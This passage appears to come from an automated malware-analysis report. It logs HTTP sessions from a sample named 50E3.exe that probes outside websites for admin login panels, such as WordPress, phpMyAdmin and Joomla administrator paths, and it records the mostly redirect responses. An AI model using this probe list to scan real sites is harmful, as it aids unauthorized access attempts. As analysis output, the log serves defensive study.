Nov 30, 2023 11:23:24.461911917 CET	445	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:24 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:25.240282059 CET	273	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
Nov 30, 2023 11:23:25.419966936 CET	454	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:25 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
295	192.168.2.4	52181	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:24.395616055 CET	217	OUT	GET /admin HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:24.586308002 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:24 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
296	192.168.2.4	52255	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:24.405714035 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:24.584429026 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:24 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:25.429728985 CET	257	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
Nov 30, 2023 11:23:25.608861923 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:25 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
297	192.168.2.4	53935	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:24.881763935 CET	217	OUT	GET /admin HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:25.072133064 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:24 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
298	192.168.2.4	56206	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:25.368105888 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:25.548445940 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:25 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
299	192.168.2.4	56366	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:25.419285059 CET	218	OUT	GET /admin/ HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:25.611238956 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:25 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
300	192.168.2.4	56379	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:25.419323921 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:25.597954035 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:25 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
301	192.168.2.4	56789	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:26.060154915 CET	224	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:26.243421078 CET	445	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:26 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:28.051640034 CET	273	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
Nov 30, 2023 11:23:28.230346918 CET	454	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:28 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
302	192.168.2.4	57530	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:27.304538012 CET	219	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:27.484349966 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:27 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
303	192.168.2.4	57535	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:27.317905903 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:27.498907089 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:27 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
304	192.168.2.4	57548	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:27.317951918 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:27.499385118 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:27 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:28.688983917 CET	257	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
Nov 30, 2023 11:23:28.870141983 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:28 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.4	58475	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:28.169878960 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:28.350279093 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:28 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.4	58929	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:28.384799957 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:28.563877106 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:28 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.4	60417	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:28.922988892 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:29.102727890 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.4	60422	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:28.925316095 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:29.105034113 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:29 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.4	60993	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:29.188731909 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
